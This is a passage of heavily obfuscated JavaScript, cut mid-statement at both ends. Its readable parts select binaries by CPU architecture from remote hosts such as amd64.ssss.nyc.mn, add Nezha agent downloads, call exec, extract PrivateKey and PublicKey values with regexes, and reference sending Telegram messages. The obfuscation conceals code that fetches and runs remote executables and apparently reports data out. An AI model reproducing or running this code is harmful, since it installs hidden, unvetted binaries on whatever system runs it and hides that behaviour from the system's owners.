ba19d:0x3ae,_0x25b3df:0x4e4,_0x5a69e3:0x41b,_0x3cbe03:0x37d,_0x240e71:0x5e5,_0x414e6d:0x6de,_0x368355:0x4de,_0x56e14b:0x5ed,_0x32e828:0xd0,_0x4bad51:0x116,_0xdb8081:0x278,_0x23caa5:0x27f,_0x2b74d7:0x24a,_0x1ea4a2:0x403,_0xf83fe5:0x27c,_0x4f402f:0xf3,_0xb8a4e1:0x26,_0x2f5e8d:0xcf,_0x4a0745:0x23a,_0x24d992:0x100,_0x20dd9d:0x122,_0x2861d3:0x4f3,_0x145d11:0x35b,_0x4bd41f:0x4c6,_0x2140ad:0x6fe,_0x5b21c5:0x5aa,_0x1b9004:0x527,_0x10b877:0x5dc,_0x580eec:0x68f,_0x418356:0x5b9,_0x4073fc:0x552,_0x3d31c0:0x6af,_0x12be78:0x665,_0x1dd2bb:0x604,_0x115b88:0x248,_0x3c40b3:0x142,_0x34b03d:0x101,_0x283292:0x1f},_0x4792c8={_0x4907e5:0x4af,_0x146802:0x364,_0x184e3f:0x460},_0x179ad9={_0x565f66:0x20,_0x5598fb:0x126,_0x57fe8d:0xa,_0xaa900c:0x44},_0x3465b4={_0x25283c:0xce,_0x57dea0:0x42f,_0x926d9a:0x163},_0x4305e5={_0x1d7c2d:0x128,_0x8b0d6e:0x239,_0x4bd180:0x17c};function _0x21efa1(_0x27b97e,_0x454f76,_0x4fcbaf,_0x1a670b){return _0x33ccd3(_0x27b97e-_0x4305e5._0x1d7c2d,_0x27b97e- -_0x4305e5._0x8b0d6e,_0x4fcbaf-_0x4305e5._0x4bd180,_0x454f76);}function _0x1b759a(_0xc5a557,_0x1ee4ed,_0x3fb6ff,_0x33e2d4){return _0x33ccd3(_0xc5a557-_0x3465b4._0x25283c,_0x1ee4ed- -_0x3465b4._0x57dea0,_0x3fb6ff-_0x3465b4._0x926d9a,_0xc5a557);}const _0x39cc5a={'bnHVb':_0x21efa1(_0x4e715d._0x1a32da,_0x4e715d._0x44b692,0x354,_0x4e715d._0x104150),'huqFQ':_0x1b759a(_0x4e715d._0x2b74cb,_0x4e715d._0x50e7a2,_0x4e715d._0xe8ad85,_0x4e715d._0x937a6b),'zYZOl':_0x1b759a(_0x4e715d._0xdb5079,_0x4e715d._0x137a4b,_0x4e715d._0x5a0824,_0x4e715d._0x1ca1b3),'NLRJD':_0x21efa1(_0x4e715d._0x36808b,_0x4e715d._0x4c468e,_0x4e715d._0x8474ed,_0x4e715d._0x2e486c),'ygHfK':function(_0x3ba55d,_0x5def12,_0x1de7e1){return _0x3ba55d(_0x5def12,_0x1de7e1);},'xhxzp':'curl\x20-o\x20/dev/null\x20-m\x202\x20-s\x20-w\x20\x22%{http_code}\x22\x20https://www.youtube.com','hJlxq':_0x1b759a(_0x4e715d._0x1ea2b8,_0x4e715d._0x83d533,_0x4e715d._0x11110e,_0x4e715d._0x277228),'rHtCX':function(_0x32f542,_0x4ab70d){return _0x32f542===_0x4ab70d;},'ebKlZ':function(_0x50e5dc,_0x473057){return _0x50e5dc!==_0x473057;},'SxdnV':_0x21efa1(_0x4e715d._0x10540a,0x50b,_0x4e715d._0x192599,0x479),'ETpvU':_0x1b759a(_0x4e715d._0x20032c,_0x4e715d._0x8b16ba,_0x4e715d._0x488f2f,_0x4e715d._0x4875fd),'qBYwB':function(_0x2f866e,_0x5d4a1f){return _0x2f866e(_0x5d4a1f);},'mXsRO':_0x21efa1(_0x4e715d._0x183465,_0x4e715d._0x2101ed,_0x4e715d._0x50bbef,_0x4e715d._0x37081c),'fKxIX':function(_0x1f7d5e,_0x3e2cc8){return _0x1f7d5e===_0x3e2cc8;},'NtEcC':_0x21efa1(_0x4e715d._0x37812d,_0x4e715d._0x5957f0,_0x4e715d._0x4935fc,_0x4e715d._0x200c3e)};return new Promise((_0x298504,_0x5b7c84)=>{const _0x1cd012={_0x14d394:0x80,_0x4d10d3:0x164,_0x5558a:0x93},_0x1e64b1={_0x4085aa:0x185},_0x11790e={_0x2ea203:0x1c0,_0x58dd97:0x6c,_0x56d6d0:0xb6},_0x481c41={_0x42584a:0x14f,_0x118e8a:0xeb,_0x1d4c04:0x160},_0x574b24={_0x1b94d3:0xc5,_0x33e251:0xe9},_0x545a3c={_0x4e5163:0x57,_0x35a940:0x1e},_0xfc7769={_0x32c9b3:0x2cb,_0xd553c1:0xd6};function _0x530f50(_0x2361e4,_0x2347c1,_0x47d791,_0x1ae32b){return _0x1b759a(_0x1ae32b,_0x2361e4- -_0xfc7769._0x32c9b3,_0x47d791-_0xfc7769._0xd553c1,_0x1ae32b-0x152);}function _0xd3718a(_0x2953b8,_0x19c4b4,_0x471884,_0xee0bd6){return _0x1b759a(_0x19c4b4,_0xee0bd6- -_0x545a3c._0x4e5163,_0x471884-0x195,_0xee0bd6-_0x545a3c._0x35a940);}const _0x285d80={'cTVwT':_0x530f50(-_0xa8fe9f._0x441424,-0x110,-_0xa8fe9f._0x3bbdcc,-_0xa8fe9f._0x4b4b75),'diONh':_0x530f50(-_0xa8fe9f._0x430d71,-_0xa8fe9f._0x3f7ea3,-_0xa8fe9f._0x55e4b0,-0x130),'TyNNM':'binary','zcQCk':_0x39cc5a[_0xd3718a(_0xa8fe9f._0x419649,0x162,_0xa8fe9f._0x242943,_0xa8fe9f._0x2b6a3e)],'ReSzb':_0x39cc5a[_0xd3718a(0xb1,_0xa8fe9f._0x53c202,_0xa8fe9f._0x1e30fa,_0xa8fe9f._0x3b19d1)],'itwww':_0x530f50(0x39,0xa2,_0xa8fe9f._0x59b39d,0x82),'iNSuz':function(_0x36942a,_0x5a6546,_0x415885){function _0x3259b5(_0x4a887e,_0x3452d3,_0x5ec772,_0x4219b3){return _0x530f50(_0x5ec772-0x74,_0x3452d3-_0x574b24._0x1b94d3,_0x5ec772-_0x574b24._0x33e251,_0x4219b3);}return _0x39cc5a[_0x3259b5(_0x481c41._0x42584a,_0x481c41._0x118e8a,-0x1c,-_0x481c41._0x1d4c04)](_0x36942a,_0x5a6546,_0x415885);},'QoAWW':_0x39cc5a['xhxzp'],'dWWCB':_0x39cc5a[_0x530f50(_0xa8fe9f._0x405c74,_0xa8fe9f._0x227f85,0x126,_0xa8fe9f._0x5b9220)],'zKRls':function(_0x3fe95e,_0x13f232){function _0x5bd240(_0x231bf6,_0x5b3abd,_0x360af7,_0x11eac3){return _0xd3718a(_0x231bf6-_0x11790e._0x2ea203,_0x360af7,_0x360af7-_0x11790e._0x58dd97,_0x11eac3- -_0x11790e._0x56d6d0);}return _0x39cc5a[_0x5bd240(_0x179ad9._0x565f66,-_0x179ad9._0x5598fb,-_0x179ad9._0x57fe8d,-_0x179ad9._0xaa900c)](_0x3fe95e,_0x13f232);},'OpkEa':function(_0x381aa7,_0x6f8a1c){const _0x46a116={_0x2333aa:0x3c0,_0x25548d:0x1f1};function _0x4c50c6(_0x411c5b,_0x1f0a98,_0x4c6124,_0x29af35){return _0x530f50(_0x29af35-_0x46a116._0x2333aa,_0x1f0a98-0x84,_0x4c6124-_0x46a116._0x25548d,_0x4c6124);}return _0x39cc5a[_0x4c50c6(_0x4792c8._0x4907e5,_0x4792c8._0x146802,_0x4792c8._0x184e3f,0x3fa)](_0x381aa7,_0x6f8a1c);},'ZybJJ':_0x39cc5a[_0x530f50(-_0xa8fe9f._0x15bd19,-0x126,-_0xa8fe9f._0x16db6c,-_0xa8fe9f._0x56a73a)],'XIrua':_0x39cc5a[_0xd3718a(_0xa8fe9f._0x116357,_0xa8fe9f._0x47562a,_0xa8fe9f._0xa814b6,_0xa8fe9f._0x13fea7)],'ssorg':function(_0x4e49d0,_0x102f19){return _0x39cc5a['qBYwB'](_0x4e49d0,_0x102f19);},'vkHhF':_0x39cc5a['mXsRO'],'aBHpt':function(_0x2d9166,_0x21e442){return _0x2d9166||_0x21e442;}};if(_0x39cc5a[_0x530f50(-0x3c,-0xf9,0x8f,-0x117)](_0x39cc5a[_0xd3718a(_0xa8fe9f._0x5265b8,_0xa8fe9f._0x2ae43f,_0xa8fe9f._0x1ac5f8,_0xa8fe9f._0x1afafc)],_0x39cc5a[_0x530f50(-_0xa8fe9f._0x2c2356,_0xa8fe9f._0x4f9771,_0xa8fe9f._0x241933,-_0xa8fe9f._0x3e6f8b)]))_0x39cc5a[_0xd3718a(_0xa8fe9f._0x30a9d8,_0xa8fe9f._0x2ab42c,0x1c6,_0xa8fe9f._0x3df2e6)](exec,_0x42e75e,(_0x393ae6,_0x3a766b,_0x57c904)=>{function _0xec67f3(_0x36e7a0,_0x3b2356,_0x1ee8e7,_0x3ce200){return _0xd3718a(_0x36e7a0-_0x1e64b1._0x4085aa,_0x1ee8e7,_0x1ee8e7-0x156,_0x3ce200-0x2c4);}function _0x238eff(_0xd40b04,_0xde91c7,_0x328dca,_0x5f3d2f){return _0x530f50(_0xde91c7-_0x1cd012._0x14d394,_0xde91c7-_0x1cd012._0x4d10d3,_0x328dca-_0x1cd012._0x5558a,_0x328dca);}if(_0x285d80[_0xec67f3(_0x5e23f7._0x28d301,0x350,_0x5e23f7._0x503578,_0x5e23f7._0x4a132a)](_0x285d80[_0xec67f3(_0x5e23f7._0x5a1e90,0x681,0x457,_0x5e23f7._0x2d3014)],_0xec67f3(_0x5e23f7._0x397aee,_0x5e23f7._0x5919b2,_0x5e23f7._0x2095f4,_0x5e23f7._0x308ca5))){if(_0x393ae6){if(_0x285d80[_0x238eff(-_0x5e23f7._0x36ccce,-_0x5e23f7._0x297c3a,-_0x5e23f7._0x2a0418,0xe)](_0x285d80[_0xec67f3(_0x5e23f7._0x31c6c5,_0x5e23f7._0x51bdab,_0x5e23f7._0x523a3a,_0x5e23f7._0x463afb)],_0x285d80['XIrua']))_0x285d80[_0x238eff(-0x100,-_0x5e23f7._0x206d3e,-_0x5e23f7._0x2892a5,-_0x5e23f7._0x4354d8)](_0x5b7c84,_0x393ae6);else{const _0x22eb7b={};_0x22eb7b['tag']=_0x285d80['cTVwT'],_0x22eb7b['type']=_0x285d80[_0x238eff(_0x5e23f7._0x588795,_0x5e23f7._0xf7c00f,-_0x5e23f7._0x548e09,0x9a)],_0x22eb7b[_0xec67f3(_0x5e23f7._0x37b549,_0x5e23f7._0xf54dd7,_0x5e23f7._0x309013,_0x5e23f7._0x5adef8)]=_0x285d80[_0x238eff(-_0x5e23f7._0x88aacf,-_0x5e23f7._0x39b5e0,-0x134,-_0x5e23f7._0x2fc073)],_0x22eb7b['url']=_0x285d80[_0xec67f3(_0x5e23f7._0x2bcbdb,_0x5e23f7._0xa8c565,_0x5e23f7._0x5ba19d,_0x5e23f7._0x25b3df)],_0x22eb7b['download_detour']=_0x285d80['ReSzb'],_0x325e74[_0xec67f3(0x492,_0x5e23f7._0x5a69e3,0x2d2,_0x5e23f7._0x3cbe03)][_0xec67f3(_0x5e23f7._0x240e71,_0x5e23f7._0x414e6d,_0x5e23f7._0x368355,_0x5e23f7._0x56e14b)][_0x238eff(_0x5e23f7._0x32e828,_0x5e23f7._0x4bad51,_0x5e23f7._0xdb8081,_0x5e23f7._0x23caa5)](_0x22eb7b);}}else _0xec67f3(_0x5e23f7._0x2b74d7,_0x5e23f7._0x1ea4a2,_0x5e23f7._0xf83fe5,0x394)!==_0x285d80[_0x238eff(-0x184,-_0x5e23f7._0x4f402f,_0x5e23f7._0xb8a4e1,-_0x5e23f7._0x2f5e8d)]?_0x298504(_0x285d80['aBHpt'](_0x3a766b,_0x57c904)):_0xacd3e4[_0x238eff(-_0x5e23f7._0x4a0745,-0x10b,-_0x5e23f7._0x24d992,-_0x5e23f7._0x20dd9d)](_0x285d80[_0xec67f3(_0x5e23f7._0x2861d3,0x45c,_0x5e23f7._0x145d11,_0x5e23f7._0x4bd41f)],_0x534ea9);}else{const _0x45e132=_0x285d80[_0xec67f3(_0x5e23f7._0x2140ad,_0x5e23f7._0x5b21c5,_0x5e23f7._0x1b9004,_0x5e23f7._0x10b877)](_0x9afd70,_0x285d80[_0xec67f3(_0x5e23f7._0x580eec,0x4b5,_0x5e23f7._0x418356,_0x5e23f7._0x4073fc)],{'encoding':_0x285d80['dWWCB']})[_0xec67f3(0x542,_0x5e23f7._0x3d31c0,_0x5e23f7._0x12be78,_0x5e23f7._0x1dd2bb)]();_0x5e5c73=_0x285d80['zKRls'](_0x45e132,_0x238eff(_0x5e23f7._0x115b88,_0x5e23f7._0x3c40b3,_0x5e23f7._0x34b03d,_0x5e23f7._0x283292));}});else{const _0x427497=_0x4f7bf3[_0xd3718a(_0xa8fe9f._0x31104a,_0xa8fe9f._0x32994b,_0xa8fe9f._0x1fa7d4,_0xa8fe9f._0x3f83dd)](_0x8ab1ef,_0xd3718a(_0xa8fe9f._0x2a0d32,0x3ce,_0xa8fe9f._0x4adb3d,_0xa8fe9f._0x652a59)),_0x4c8bdb=_0x427497[_0xd3718a(_0xa8fe9f._0x5f0485,_0xa8fe9f._0x1921cc,_0xa8fe9f._0x3f34ac,0x11c)](/PrivateKey:\s*(.*)/),_0x34d917=_0x427497[_0x530f50(-0x158,-_0xa8fe9f._0x5b44aa,-_0xa8fe9f._0x492c06,-0x20c)](/PublicKey:\s*(.*)/);_0x5be85a=_0x4c8bdb?_0x4c8bdb[0x22*0x29+-0x18ca+0xd*0x17d]:'',_0x50bf3f=_0x34d917?_0x34d917[0x8e1+0x1*0x1dd7+0x35*-0xbb]:'';if(!_0x1363d9||!_0xa9bb82){_0x5096aa[_0xd3718a(-_0xa8fe9f._0x11e0aa,_0xa8fe9f._0xa58e5d,0x172,_0xa8fe9f._0x20e9da)](_0x39cc5a[_0xd3718a(0x256,_0xa8fe9f._0x4195d9,0x201,_0xa8fe9f._0x585f9d)]);return;}_0x18350f[_0x530f50(_0xa8fe9f._0x55d669,_0xa8fe9f._0x3f4be2,_0xa8fe9f._0x5991b7,0x49)](_0x39cc5a[_0xd3718a(_0xa8fe9f._0x25ae79,0x32,_0xa8fe9f._0x3d9e94,0x144)],_0x354cdf),_0xd0be26[_0x530f50(_0xa8fe9f._0x1c514e,_0xa8fe9f._0x307b31,-_0xa8fe9f._0x154359,-_0xa8fe9f._0xd8c4a9)](_0xd3718a(0xd0,_0xa8fe9f._0x2a5729,_0xa8fe9f._0xd38d76,_0xa8fe9f._0x37cdac),_0x3c3ce9),_0x176cb4();}});}function getFilesForArchitecture(_0x376e8f){const _0x435d4e={_0x17e4ae:0x183,_0x5df4f8:0x6c6,_0x4b0bb6:0x4ac,_0x23c833:0x5ef,_0x2b00df:0x567,_0x5cf064:0x368,_0x3b19d4:0x4e9,_0x598426:0x314,_0x5eb101:0x3f2,_0x5a9665:0x513,_0x1a3b11:0x518,_0x53e3f7:0x54a,_0x78e64b:0xeb,_0x261fb9:0x80,_0x217396:0x1b1,_0x5b6041:0x7a,_0x204338:0x51,_0x956223:0x58,_0x46e0a7:0x187,_0x552b34:0x52c,_0x36df85:0x4c8,_0x575cf9:0x595,_0x38ad0a:0x5ba,_0x3d205d:0x486,_0x3d908:0x428,_0x409018:0x291,_0x4df6df:0x207,_0x2762e2:0xa3,_0x466290:0xa1,_0x5c7dca:0x14f,_0x1d6466:0x108,_0x168cec:0x204,_0xa922aa:0xcc,_0x41e521:0x1ff,_0x4f7400:0x91,_0x566a15:0x66,_0x54fb1b:0x16f,_0x103e3c:0xe2,_0x44c013:0xd5,_0x40ca56:0x498,_0x17d322:0x453,_0x568ab3:0x510,_0x5cd4b6:0xd9,_0x278a86:0x18a,_0x1b1884:0xfa,_0x2b375b:0x2c,_0x36180a:0x15f,_0x15080b:0xb0,_0x3a884f:0x102,_0x2856ec:0x21b,_0x50fbe5:0x1a0,_0x4ea9d7:0xb5,_0x233705:0x92,_0x396959:0xc6,_0x40c443:0x3ae,_0x5bc6ed:0x511,_0x5d5866:0x26,_0x421f24:0x170,_0x54d153:0x26b,_0x532068:0x1f7,_0x485abb:0xa6,_0x34044c:0x47,_0x481795:0x221,_0x110da3:0x155,_0x502057:0x32,_0x551cf3:0x64,_0x1344b2:0x507,_0x49dc0e:0x66f,_0x357fd0:0x585,_0x260386:0x49b,_0x273e5c:0x319,_0x50957a:0x392,_0x226fec:0x1c,_0x4e7e35:0x61,_0x2176e6:0x94,_0x1b963a:0xa2,_0x139dbd:0x579,_0x3d7953:0x396,_0x359440:0x5f9,_0x54d641:0x4ae,_0x5afbe4:0x440,_0x5157e7:0x419,_0x14ab78:0x494,_0x15dec0:0x109,_0x4166c8:0x108,_0x31426d:0x20,_0x14004c:0x13,_0x7ba02f:0x473,_0x428fe7:0x546,_0x6bc680:0x748,_0x180afa:0x509,_0x16047c:0x61d,_0x461ebf:0x205,_0x55d94d:0xa7,_0x1229b8:0x213,_0xd0b503:0x47f,_0x465f01:0x5d,_0x369f8f:0x10b,_0xa40ebb:0x418,_0x20eb03:0x41a,_0x954a84:0x3c0,_0x5a3ba4:0x257,_0x4cbf28:0x16c,_0x3bbf8e:0x64d,_0x514906:0x623,_0x1d9a05:0x53d,_0x313e52:0x5a8,_0xd381d5:0x668,_0x30ecfd:0x4b9,_0x4440e3:0x517,_0x294325:0x511,_0xad4e19:0x678,_0x358334:0x554,_0x3cc9ed:0x375,_0x50e12b:0x58d,_0x429c00:0x4e1,_0x45da88:0x45e,_0x7824c1:0x6d,_0x492e0e:0x11c,_0x4e4068:0xa0,_0x249333:0x11,_0x34a691:0x55b,_0x9644c:0x3eb,_0x5c3edd:0x43f,_0xfe6598:0x5c6,_0xe815e1:0x4f3,_0x3b5c77:0x484,_0x459b2c:0x4ad,_0xd1e3a0:0x556,_0x254b54:0x494,_0x35bfaa:0x5a6,_0x5b5db8:0x4d7},_0x2c2614={_0x43429b:0x6c,_0x52df99:0x3d,_0x434360:0x5c0},_0xfb3d6={_0x3eb91e:0x1dd,_0x4c2cbb:0x77,_0x49bb65:0x112},_0x18cf40={};_0x18cf40[_0x5251b8(-0x9,-0x8d,-_0x435d4e._0x17e4ae,-0xcf)]='Failed\x20to\x20send\x20Telegram\x20message',_0x18cf40['ZCXLh']=function(_0xf577d6,_0x1f84c1){return _0xf577d6===_0x1f84c1;},_0x18cf40['TuFCq']=_0x451d7a(_0x435d4e._0x5df4f8,_0x435d4e._0x4b0bb6,_0x435d4e._0x23c833,_0x435d4e._0x2b00df),_0x18cf40[_0x451d7a(_0x435d4e._0x5cf064,_0x435d4e._0x3b19d4,_0x435d4e._0x598426,0x44d)]=_0x451d7a(_0x435d4e._0x5eb101,_0x435d4e._0x5a9665,_0x435d4e._0x1a3b11,_0x435d4e._0x53e3f7),_0x18cf40[_0x5251b8(0x240,_0x435d4e._0x78e64b,-_0x435d4e._0x261fb9,_0x435d4e._0x217396)]=_0x5251b8(_0x435d4e._0x5b6041,_0x435d4e._0x204338,-_0x435d4e._0x956223,_0x435d4e._0x46e0a7),_0x18cf40[_0x451d7a(0x689,_0x435d4e._0x552b34,_0x435d4e._0x36df85,_0x435d4e._0x575cf9)]=_0x451d7a(_0x435d4e._0x38ad0a,_0x435d4e._0x3d205d,_0x435d4e._0x3d908,0x4f4),_0x18cf40[_0x5251b8(_0x435d4e._0x409018,0x17c,_0x435d4e._0x4df6df,_0x435d4e._0x2762e2)]=_0x5251b8(-0x5c,-0xca,-0x1df,_0x435d4e._0x466290),_0x18cf40[_0x5251b8(_0x435d4e._0x5c7dca,_0x435d4e._0x1d6466,_0x435d4e._0x168cec,_0x435d4e._0xa922aa)]=function(_0x4a1134,_0x4bd5f1){return _0x4a1134!==_0x4bd5f1;},_0x18cf40[_0x5251b8(_0x435d4e._0x41e521,0xbb,0x1b7,_0x435d4e._0x4f7400)]=_0x5251b8(_0x435d4e._0x566a15,_0x435d4e._0x54fb1b,_0x435d4e._0x103e3c,_0x435d4e._0x44c013),_0x18cf40[_0x451d7a(_0x435d4e._0x40ca56,_0x435d4e._0x17d322,0x581,_0x435d4e._0x568ab3)]=_0x5251b8(0x3c,-0x104,-_0x435d4e._0x5cd4b6,0x10),_0x18cf40['Dhqlp']='https://amd64.ssss.nyc.mn/bot';function _0x5251b8(_0x5bb0c7,_0x270a34,_0x1b7e2b,_0x27ee15){return _0xe14257(_0x5bb0c7-_0xfb3d6._0x3eb91e,_0x270a34-_0xfb3d6._0x4c2cbb,_0x27ee15,_0x270a34-_0xfb3d6._0x49bb65);}_0x18cf40[_0x5251b8(_0x435d4e._0x278a86,_0x435d4e._0x1b1884,_0x435d4e._0x2b375b,_0x435d4e._0x36180a)]=function(_0x43c0bd,_0x446150){return _0x43c0bd&&_0x446150;},_0x18cf40[_0x5251b8(_0x435d4e._0x15080b,_0x435d4e._0x3a884f,0x95,_0x435d4e._0x2856ec)]=_0x5251b8(-_0x435d4e._0x50fbe5,-_0x435d4e._0x4ea9d7,_0x435d4e._0x233705,-_0x435d4e._0x396959);function _0x451d7a(_0x172095,_0x899187,_0x1bee66,_0x46bc46){return _0xe14257(_0x172095-_0x2c2614._0x43429b,_0x899187-_0x2c2614._0x52df99,_0x899187,_0x46bc46-_0x2c2614._0x434360);}_0x18cf40[_0x451d7a(0x45d,_0x435d4e._0x40c443,0x506,_0x435d4e._0x5bc6ed)]=_0x5251b8(_0x435d4e._0x5d5866,_0x435d4e._0x421f24,0x61,_0x435d4e._0x54d153),_0x18cf40[_0x5251b8(_0x435d4e._0x532068,0x1b2,_0x435d4e._0x485abb,_0x435d4e._0x34044c)]=_0x5251b8(_0x435d4e._0x481795,_0x435d4e._0x110da3,_0x435d4e._0x502057,_0x435d4e._0x551cf3),_0x18cf40[_0x451d7a(_0x435d4e._0x1344b2,0x65c,_0x435d4e._0x49dc0e,_0x435d4e._0x357fd0)]='php';const _0xc2bc55=_0x18cf40;let _0x2a8698;if(_0xc2bc55['ZCXLh'](_0x376e8f,_0xc2bc55[_0x451d7a(_0x435d4e._0x260386,_0x435d4e._0x273e5c,0x3b5,_0x435d4e._0x50957a)])){const _0x43aed7={};_0x43aed7['fileName']=_0xc2bc55[_0x5251b8(_0x435d4e._0x226fec,-_0x435d4e._0x4e7e35,_0x435d4e._0x2176e6,-_0x435d4e._0x1b963a)],_0x43aed7['fileUrl']=_0xc2bc55['QFnIA'];const _0x20abb0={};_0x20abb0[_0x451d7a(_0x435d4e._0x139dbd,_0x435d4e._0x3d7953,_0x435d4e._0x359440,_0x435d4e._0x54d641)]=_0xc2bc55['WDXkV'],_0x20abb0[_0x451d7a(_0x435d4e._0x5afbe4,_0x435d4e._0x5157e7,0x576,_0x435d4e._0x14ab78)]=_0xc2bc55['UJDpr'],_0x2a8698=[_0x43aed7,_0x20abb0];}else{if(_0xc2bc55[_0x5251b8(_0x435d4e._0x15dec0,_0x435d4e._0x4166c8,_0x435d4e._0x31426d,-_0x435d4e._0x14004c)](_0xc2bc55[_0x451d7a(0x62b,_0x435d4e._0x7ba02f,_0x435d4e._0x428fe7,0x569)],_0x451d7a(_0x435d4e._0x6bc680,_0x435d4e._0x23c833,_0x435d4e._0x180afa,_0x435d4e._0x16047c)))_0x56225a[_0x5251b8(-_0x435d4e._0x461ebf,-_0x435d4e._0x55d94d,-0x89,-_0x435d4e._0x1229b8)](_0xc2bc55['toGSv'],_0x4eba3d);else{const _0x32332e={};_0x32332e['fileName']=_0xc2bc55[_0x451d7a(0x5b1,_0x435d4e._0xd0b503,0x51d,0x44d)],_0x32332e[_0x5251b8(_0x435d4e._0x465f01,-0x1a,_0x435d4e._0x369f8f,0xaf)]=_0xc2bc55[_0x451d7a(_0x435d4e._0xa40ebb,_0x435d4e._0x20eb03,_0x435d4e._0x954a84,_0x435d4e._0x568ab3)];const _0x282c11={};_0x282c11['fileName']=_0xc2bc55[_0x5251b8(-0x4c,0xe7,_0x435d4e._0x5a3ba4,_0x435d4e._0x4cbf28)],_0x282c11['fileUrl']=_0xc2bc55[_0x451d7a(0x7b8,0x5f6,0x634,_0x435d4e._0x3bbf8e)],_0x2a8698=[_0x32332e,_0x282c11];}}if(_0xc2bc55[_0x451d7a(_0x435d4e._0x514906,0x5d1,_0x435d4e._0x1d9a05,_0x435d4e._0x313e52)](NEZHA_SERVER,NEZHA_KEY)){if(NEZHA_PORT){const _0x1e47bb=_0x376e8f===_0xc2bc55['TuFCq']?_0xc2bc55[_0x451d7a(0x53f,0x4a5,_0x435d4e._0xd381d5,0x5b0)]:_0xc2bc55[_0x451d7a(_0x435d4e._0x30ecfd,0x55f,_0x435d4e._0x4440e3,_0x435d4e._0x294325)],_0xfa1de5={};_0xfa1de5['fileName']=_0xc2bc55[_0x451d7a(_0x435d4e._0xad4e19,0x523,_0x435d4e._0x358334,0x660)],_0xfa1de5['fileUrl']=_0x1e47bb,_0x2a8698['unshift'](_0xfa1de5);}else{const _0x3f5e9a=_0xc2bc55[_0x451d7a(_0x435d4e._0x3cc9ed,_0x435d4e._0x50e12b,_0x435d4e._0x429c00,_0x435d4e._0x45da88)](_0x376e8f,_0xc2bc55[_0x5251b8(-_0x435d4e._0x7824c1,-_0x435d4e._0x492e0e,-_0x435d4e._0x4e4068,-_0x435d4e._0x249333)])?'https://arm64.ssss.nyc.mn/v1':_0x451d7a(_0x435d4e._0x34a691,_0x435d4e._0x9644c,0x45b,_0x435d4e._0x5c3edd),_0x24788a={};_0x24788a[_0x451d7a(_0x435d4e._0xfe6598,_0x435d4e._0xe815e1,_0x435d4e._0x3b5c77,_0x435d4e._0x54d641)]=_0xc2bc55[_0x451d7a(0x625,_0x435d4e._0x459b2c,0x5c0,0x585)],_0x24788a[_0x451d7a(0x439,_0x435d4e._0xd1e3a0,0x4cb,_0x435d4e._0x254b54)]=_0x3f5e9a,_0x2a8698[_0x451d7a(0x3ae,_0x435d4e._0x35bfaa,0x616,_0x435d4e._0x5b5db8)](_0x24788a);}}return _0x2a8698;}function _0x33ccd3(_0x3d7fb4,_0x32ab5a,_0x570bc6,_0x37945e){const _0x326d43={_0x2c70b5:0x3d5};return _0x325c(_0x32ab5a-_0x326d43._0x2c70b5,_0x37945e);}async function extractDomains(){const _0x30963d={_0x14a625:0x108,_0x40048b:0x125,_0x375a06:0x162,_0xe5092a:0x101,_0x30329c:0x60,_0x11f11a:0x133,_0x16e8e:0xe,_0x3add8c:0x8e,_0x198762:0x41,_0x48c621:0x99,_0x148a11:0x69,_0x141fe8:0x38,_0x38caac:0x16d,_0x2bb8df:0x74,_0x52d052:0xf3,_0x22d46c:0x127,_0xd15525:0xbe,_0x16c9b8:0x1bf,_0x160c15:0x27e,_0x56dfe4:0x295,_0x599a72:0x37d,_0x263fc7:0x15,_0x423e26:0x1f,_0x4fec29:0xc9,_0x44cd7a:0x76,_0x462155:0xaf,_0xb54368:0x70,_0x366581:0xa8,_0x4d8a15:0xc1,_0x41fc16:0x79,_0x5e155f:0x115,_0x182101:0x79,_0x3eef88:0x2a,_0x3d521d:0x89,_0x22f3d7:0x2a,_0x19dcf0:0x142,_0x443c31:0x195,_0x57b166:0x12d,_0x1be551:0xb1,_0x1ba114:0x87,_0x576522:0x171,_0xbd0a9c:0x1ca,_0x2a329e:0x17e,_0x372ecc:0x2c1,_0x234048:0x37a,_0x27442c:0x27f,_0x100292:0x353,_0x40e437:0x116,_0xf2d057:0x47,_0x4c4798:0x7f,_0x20ea9d:0x197,_0x1155d2:0x46,_0x4a0f6b:0x1bc,_0xc644ea:0x215,_0x4d9599:0xa8,_0x45960a:0x1bd,_0x300079:0x96,_0x2053e0:0x9d,_0x6f6d7b:0xad,_0x551fa1:0x26,_0x16475b:0x11b,_0x56f7a0:0x1c2,_0xa85ed0:0x22a,_0x2eaa67:0x1e9,_0x320a53:0x2a,_0x58696c:0x287,_0x1e74a3:0x14c,_0x584490:0x138,_0x219178:0x4b,_0x1c94f5:0x1f8,_0x23c0a3:0x277,_0x210491:0x146,_0x35e470:0x27c,_0x3b4469:0x102,_0x1a5b48:0x10b,_0x1a0497:0x28,_0x2b7d28:0x2e,_0x159f49:0x13,_0x582539:0x100,_0x5f5138:0x3,_0x50730f:0x28,_0x366000:0x9c,_0x2cba9e:0x174,_0x399007:0xa5,_0x4bfd4c:0xf2,_0x32b0d7:0x18a,_0x4783e4:0x120,_0x2065f2:0x13f,_0x51ac7c:0xee,_0x126dd4:0x7b,_0x67e255:0x3c,_0x5c8590:0x105,_0xc75fce:0x285,_0xebda2b:0x32f,_0x3eb699:0x256,_0x51a4d8:0x3cc,_0x4c631e:0x221,_0x4d5946:0x238,_0x361443:0xdf,_0x4b971c:0x305,_0x384b70:0x222,_0x1f2871:0x175,_0x58651a:0x38,_0xb82664:0x226,_0x189e6d:0x2dc,_0x27a38f:0x11a,_0x3491ea:0x17b,_0x410fb4:0x54,_0x3846f4:0x2c,_0x30abee:0x57,_0x1d4db4:0x1ea,_0x438d17:0xf3,_0x434ef8:0x6e,_0x2c3944:0x189,_0x58fa77:0x8e,_0x555665:0x158,_0x56a093:0x1e7,_0x2c6ae1:0xe5,_0x4f82ce:0x6c,_0x518870:0x10,_0x3e842b:0x107,_0x62a392:0x259,_0x41052e:0x1c8,_0x486691:0x9,_0x123b8f:0x95,_0x3ef31f:0x145,_0x54cfcc:0x11f,_0x13818d:0x50,_0x3816c5:0xfd},_0x27901b={_0x2aeec0:0x38b,_0x464487:0x414,_0x2f84b4:0x292,_0x370ba7:0x3dd,_0x4e5ea2:0x450,_0x3d89a7:0x9f,_0x45e127:0x52,_0x46c592:0x21,_0xbdce20:0x1b,_0x5ebbf0:0x58e,_0x442c89:0x574,_0x225daa:0x55d,_0xbfce07:0x2d9},_0x5cc66a={_0x38bf04:0x48a,_0x5443f7:0x374,_0x1227cc:0x39e,_0x2496c1:0x678,_0x23f51f:0x7cb,_0x4e63c1:0x731,_0x430b15:0x524},_0x249e9f={_0x1dcb59:0x4d8,_0x3b470f:0x19b,_0x311b43:0x157},_0x404e5e={_0x281836:0x45,_0x5b22ef:0x4e